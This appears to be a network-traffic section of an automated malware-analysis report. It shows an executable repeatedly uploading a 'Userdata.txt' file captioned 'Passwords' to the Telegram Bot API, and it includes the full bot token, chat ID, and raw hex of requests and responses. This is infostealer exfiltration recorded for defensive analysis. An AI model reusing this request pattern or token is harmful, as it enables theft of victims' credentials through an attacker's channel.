                                                                                                        2025-01-10 18:56:32 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 33 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44604,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535392,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.949980149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:33 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd3194e69a35fe
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:56:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 34 65 36 39 61 33 35 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd3194e69a35feContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:33 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:33 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:33 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 33 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44605,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535393,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.949982149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:35 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd31a596b280c7
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 35 39 36 62 32 38 30 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd31a596b280c7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:35 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:35 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:35 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 33 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44606,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535395,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.949984149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:36 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd31bbc6a3946a
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 62 63 36 61 33 39 34 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd31bbc6a3946aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:37 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:37 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:37 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 33 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44607,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535397,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.949986149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:39 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd31d345a4d69d
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:56:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 33 34 35 61 34 64 36 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd31d345a4d69dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:39 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:39 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:39 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 33 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44608,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535399,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.949988149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:40 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd31e7ef48443f
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:40 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 37 65 66 34 38 34 34 33 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd31e7ef48443fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:41 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:41 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:41 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 30 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44609,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535401,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.949990149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:42 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd31fb2850ffee
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:56:42 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 62 32 38 35 30 66 66 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd31fb2850ffeeContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:43 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:43 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:43 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 30 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44610,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535403,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        10192.168.2.949992149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:44 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd320cf48f9ec6
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 63 66 34 38 66 39 65 63 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd320cf48f9ec6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:44 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:44 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
